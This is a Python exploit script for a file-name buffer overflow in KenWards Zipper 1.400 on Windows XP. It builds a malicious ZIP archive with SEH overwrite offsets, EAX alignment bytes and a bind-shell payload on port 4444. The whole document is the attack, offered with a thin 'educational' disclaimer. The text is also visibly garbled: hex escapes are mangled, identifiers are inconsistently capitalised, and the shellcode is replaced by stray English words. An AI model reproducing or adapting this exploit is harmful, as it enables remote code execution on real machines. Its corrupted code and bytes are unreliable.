#! /Usr/bin/python
# KenWards Zipper v1.400 File Name Buffer Overflow
# Coded by sinn3r (x90.sinner {at} gmail {d0t} com)
# Tested on: Windows XP SP3 ENG
# Reference: http://www.exploit-db.com/exploits/11834
# Big thanks to mr_me, and corelanc0d3r.
# Greetz to all the friends at Corelan Scurity Team & Exploit-DB... coolest people ever!
##
# Description:
# This exploit takes advantage of the fact too character characters get mangled, as a result
# I was able to get a shell in a more straight forward way. Very interesting exercise.
# Mr_me and tecR0c figured out this trick, of course. But I was given the honor to share it.
# Script provided as is, without any warranty.
# Use for educational purposes only. Do not use this code to do anything illegal.
# Zip file format based on:
# Http://en.wikipedia.org/wiki/ZIP_ (file_format)
Local_file_header = (
"X50x4Bx03x04" # Local file header signature
"X00x02" # Version needed to extract
"X00x08" # General purpose bit flag
"X00xDA" # Compression method
"XA2x48" # File last modification time
"X3BxF6" # File last modification date
"X66x18x0Dx4E" # CRC-32
"XEFx0Fx00x00" # Compressed size (payload size)
"X14x00x00x00" # Uncompressed size
"Xe4x4f" # File name length
"X04x00" # Extra field length
# "X73x65x63x72x65x74x73" # File name (n) ASCII "secrets"
# "X42x42x42x42" # Extra field (m)
);
Central_directory_file_header = (
"X50x4bx01x02" # Central directory file header signature
"X14x00" # Version made
"X14x00" # Version needed to extract
"X00x08" # General purpose bit flag
"X00xDA" # Compression method
"XA2x48" # File last modification time
"X3BxF6" # File last modification date
"X66x18x0Dx4E" # CRC-32
"XE4x0Fx00x00" # Compressed size (payload size)
"X14x00x00x00" # Uncompressed size
"Xe4x0f" # File name length (n)
"X04x00" # Extra field length (m)
"X04x00" # File comment length
"X00x01" # Disk number where file starts
"X00x00" # Internal file attributes
"X20x00x00x00" # External file attributes
"X00x00x00x00" # Relative offset of local file header
# "X73x65x63x72x65x74x73" # File name (n) ASCII "secrets"
# "X42x42x42x42" # Extra field (m)
# "X43x43x43x43" # File comment (k)
);
End_of_central_directory_record = (
"X50x4Bx05x06" # End of central directory signature
"X00x00" # Number of this disk
"X00x00" # Disk where central directory starts
"X01x00" # Number of central directory records on this disk
"X01x00" # Total number of central directory records
"X12x10x00x00" # Size of central directory (central directory size + payload)
"X02x10x00x00" # Offset of start of central directory, relative to start of archive (lfh + payload)
"X00x00" # Zip file comment length (n)
);
# Align EAX for the base address of the alpha2 encoded bindshell
AlignEAX = (
"X05x10x7Ex10x7E" # add eax, 0x7e0000e10
"X05x09x75x01x7E" # add eax, 0x7E017509
"X05x02x03x01x04" # add eax, 0x04010302
"X72x07" + # JB jump over the bytes we cant overwrite
"X41" * 12 # NOPs
);
# Windows/shell_bind_tcp lport = 4444 exitfunc = seh
# Alpha2 eax -- uppercase 744 bytes
Shellcode = ("response"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Success ")
#4064 + 4 bytes
# Pointer to next SEH record: 1022 bytes
# SE handler: 1026 bytes
Payload = (
"X41" * (1017-len (alignEAX)-len (shellcode) + # Padding
AlignEAX + # Align EAX for the bindshell
Shellcode + # Bindshell lport 4444
"X82x85x81x98x98" # This will get mangled and become "xE9xE0xFCxFFxFF"
"X73x97x42x42" # JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes
"X7Ex27x41x00" + # pop ret = 0x0041277E
"X44" * 3034 + # Padding
". Bin" # Fake name
);
# Create the ZIP structure with our payload
Zip = (
Local_file_header +
Payload +
Central_directory_file_header +
Payload +
End_of_central_directory_record
);